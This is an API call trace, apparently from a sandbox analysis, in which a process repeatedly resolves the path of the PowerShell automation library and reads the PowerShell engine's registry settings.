	[0230.494] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29e108, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.494] GetLastError () returned 0xcb
	[0230.495] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29e0b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.495] GetLastError () returned 0xcb
	[0230.495] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29e0b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.495] GetLastError () returned 0xcb
	[0230.495] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29e11c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.495] GetLastError () returned 0xcb
	[0230.495] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29e0cc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.495] GetLastError () returned 0xcb
	[0230.495] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29e0cc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.495] GetLastError () returned 0xcb
	[0230.495] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e62c | out: phkResult=0x29e62c*=0x1f0) returned 0x0
	[0230.495] RegQueryValueExW (in: hKey=0x1f0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x29e674, lpData=0x0, lpcbData=0x29e670*=0x0 | out: lpType=0x29e674*=0x1, lpData=0x0, lpcbData=0x29e670*=0x56) returned 0x0
	[0230.495] RegQueryValueExW (in: hKey=0x1f0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x29e674, lpData=0x7a4288, lpcbData=0x29e670*=0x56 | out: lpType=0x29e674*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x29e670*=0x56) returned 0x0
	[0230.496] RegCloseKey (hKey=0x1f0) returned 0x0
	[0230.496] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29e11c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.496] GetLastError () returned 0xcb
	[0230.496] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29e0cc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.496] GetLastError () returned 0xcb
	[0230.496] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29e0cc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.496] GetLastError () returned 0xcb
	[0230.497] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29e104, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.497] GetLastError () returned 0xcb
	[0230.497] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29e0b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.497] GetLastError () returned 0xcb
	[0230.497] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29e0b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.497] GetLastError () returned 0xcb
	[0230.509] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0230.509] GetLastError () returned 0xcb
	[0230.509] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d794, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.509] GetLastError () returned 0xcb
	[0230.509] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d744, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.510] GetLastError () returned 0xcb
	[0230.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d744, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.510] GetLastError () returned 0xcb
	[0230.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d794, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.510] GetLastError () returned 0xcb
	[0230.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d744, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.510] GetLastError () returned 0xcb
	[0230.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d744, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.510] GetLastError () returned 0xcb
	[0230.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d794, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.510] GetLastError () returned 0xcb
	[0230.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d744, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.510] GetLastError () returned 0xcb
	[0230.511] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d744, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.511] GetLastError () returned 0xcb
	[0230.511] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d794, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.511] GetLastError () returned 0xcb
	[0230.511] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d744, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.511] GetLastError () returned 0xcb
	[0230.511] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d744, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.511] GetLastError () returned 0xcb
	[0230.511] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d794, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.511] GetLastError () returned 0xcb
	[0230.511] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d744, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.511] GetLastError () returned 0xcb
	[0230.511] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d744, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.511] GetLastError () returned 0xcb
	[0230.511] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d794, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.511] GetLastError () returned 0xcb
	[0230.512] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d744, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.512] GetLastError () returned 0xcb
	[0230.512] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d744, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.512] GetLastError () returned 0xcb
	[0230.512] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d794, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.512] GetLastError () returned 0xcb
	[0230.512] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d744, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.512] GetLastError () returned 0xcb
	[0230.512] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d744, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.512] GetLastError () returned 0xcb
	[0230.512] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.512] GetLastError () returned 0xcb
	[0230.512] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.512] GetLastError () returned 0xcb
	[0230.512] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.512] GetLastError () returned 0xcb
	[0230.512] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.512] GetLastError () returned 0xcb
	[0230.513] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.513] GetLastError () returned 0xcb
	[0230.513] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.513] GetLastError () returned 0xcb
	[0230.513] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.513] GetLastError () returned 0xcb
	[0230.513] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.513] GetLastError () returned 0xcb
	[0230.513] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.513] GetLastError () returned 0xcb
	[0230.513] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.513] GetLastError () returned 0xcb
	[0230.513] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.513] GetLastError () returned 0xcb
	[0230.513] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.513] GetLastError () returned 0xcb
	[0230.513] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.513] GetLastError () returned 0xcb
	[0230.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.514] GetLastError () returned 0xcb
	[0230.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.514] GetLastError () returned 0xcb
	[0230.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.514] GetLastError () returned 0xcb
	[0230.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.514] GetLastError () returned 0xcb
	[0230.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.514] GetLastError () returned 0xcb
	[0230.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.514] GetLastError () returned 0xcb
	[0230.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.514] GetLastError () returned 0xcb
	[0230.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.514] GetLastError () returned 0xcb
	[0230.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.514] GetLastError () returned 0xcb
	[0230.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.515] GetLastError () returned 0xcb
	[0230.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.515] GetLastError () returned 0xcb
	[0230.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.515] GetLastError () returned 0xcb
	[0230.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.515] GetLastError () returned 0xcb
